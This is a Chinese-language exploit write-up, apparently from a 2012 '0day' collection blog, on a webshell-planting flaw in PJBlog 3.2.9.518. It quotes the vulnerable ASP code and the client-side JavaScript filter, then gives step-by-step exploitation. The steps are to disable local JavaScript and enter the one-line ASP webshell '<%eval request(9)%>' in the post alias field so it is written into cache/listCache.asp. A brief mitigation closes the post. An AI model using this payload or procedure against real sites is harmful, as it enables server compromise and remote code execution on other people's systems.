PJBlog 3.2.9.518 getwebshell 漏洞

2012, May 20, 11:17 AM. oday收藏
Submitted by admin

作者:不走的钟

 
版本:PJblog 3.2.9.518(2012/5/9日时为最新版本)
 
漏洞利用条件:
 
1、使用全静态模式(默认情况是全静态模式)
 
2、用户可以发帖(默认普通用户不能发帖,所以有点鸡肋)
 
漏洞描述:PJblog 3.2.9.518使用js过滤特殊字符,在使用全静态模式下,普通用户发帖即可插入asp一句话木马。
 
 
PJblog 3.2.9.518的安全还是非常不错,密码采用了sha1(pass+salt)方式,salt为6位,在这样的情况下,对注入还是非常有效,即使拿到密码也很难破解。
 
class/cls_logAction.asp部分代码如下:
 
<%
Class logArticle
………………省略………………
outIndex = outIndex & "[""A"";"&AListC&";("&clearT(AList)&")] " & Chr(13)
outIndex = outIndex & "[""G"";"&GListC&";("&clearT(GList)&")] " & Chr(13)
Dim CateKeys, CateItems, CateHKeys, CateHItems
CateKeys = CateDic.Keys
CateItems = CateDic.Items
CateHKeys = CateHDic.Keys
CateHItems = CateHDic.Items
For i = 0 To CateDic.Count -1
outIndex = outIndex & "["""&CateKeys(i)&""";"&CateHItems(i)&";("&clearT(CateItems(i))&")] " & Chr(13)
Next
 
SaveList = SaveToFile(outIndex, "cache/listCache.asp")
 
%>
 
SaveToFile函数是将outIndex内容写入到cache/listCache.asp中。
 
blogpost.asp中调用了 logArticle,部分代码如下:
 
<%
……………………
Set lArticle = New logArticle
lArticle.categoryID = request.Form("log_CateID")
lArticle.logTitle = request.Form("title")
lArticle.logAuthor = memName
lArticle.logEditType = request.Form("log_editType")
lArticle.logIntroCustom = request.Form("log_IntroC")
lArticle.logIntro = request.Form("log_Intro")
lArticle.logWeather = request.Form("log_weather")
lArticle.logLevel = request.Form("log_Level")
lArticle.logCommentOrder = request.Form("log_comorder")
lArticle.logDisableComment = request.Form("log_DisComment")
lArticle.logIsShow = IsShow
lArticle.logIsTop = request.Form("log_IsTop")
lArticle.logIsDraft = request.Form("log_IsDraft")
lArticle.logFrom = request.Form("log_From")
lArticle.logFromURL = request.Form("log_FromURL")
lArticle.logDisableImage = request.Form("log_disImg")
lArticle.logDisableSmile = request.Form("log_DisSM")
lArticle.logDisableURL = request.Form("log_DisURL")
lArticle.logDisableKeyWord = request.Form("log_DisKey")
lArticle.logMessage = request.Form("Message")
lArticle.logTrackback = request.Form("log_Quote")
lArticle.logTags = request.Form("tags")
lArticle.logPubTime = request.Form("PubTime")
lArticle.logPublishTimeType = request.Form("PubTimeType")
If blog_postFile = 2 Then
lArticle.logCname = request.Form("cname")
lArticle.logCtype = request.Form("ctype")
End If
lArticle.logReadpw = pws
lArticle.logPwtips = pwtips
lArticle.logPwtitle = pwtitle
lArticle.logPwcomm = pwcomm
lArticle.logMeta = request.Form("log_Meta")
lArticle.logKeyWords = keyword
lArticle.logDescription = B_description
if request.form("FirstPost") = 1 then
lArticle.isajax = false
lArticle.logIsDraft = false
postLog = lArticle.editLog(request.Form("postbackId"))
else
lArticle.isajax = false
postLog = lArticle.postLog
end if
Set lArticle = Nothing
%>
 
lArticle.logCname = request.Form(“cname”),并没有过滤”<%” 和”%>”
 
漏洞利用方法:
 
1、用户登陆,发表文章,如下图:

大小: 59.18 K
尺寸: 500 x 243
浏览: 46 次
点击打开新窗口浏览全图

2、禁止本地js,必须要使用这步,否则你无法输入’<’和’>’,因为作者已经考虑到安全问题,调用common.js本地过滤,
 
common/common.js 部份内容如下:
 
1
//创建文件夹规则 example:
2
//<input onblur="ReplaceInput(this,window.event)" onkeyup="ReplaceInput(this,window.event)" />
3
function ReplaceInput(obj, cevent){
4
 var str = ["<", ">", "/", "\\", ":", "*", "?", "|", "\"", /[\u4E00-\u9FA5]/g];
5
 if(cevent.keyCode != 37 && cevent.keyCode != 39){
6
 //obj.value = obj.value.replace(/[\u4E00-\u9FA5]/g,'');
7
 for (var i = 0 ; i < str.length ; i++){
8
 obj.value = obj.value.replace(str[i], "");
9
 }
10
 }
11
}
3、在别名处插入<%eval request(9)%>,提交后,即可在cache/listCache.asp中会写入一句话木马,密码为9
 
临时解决方案,禁止普通用户发帖
Tags: pjblog

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):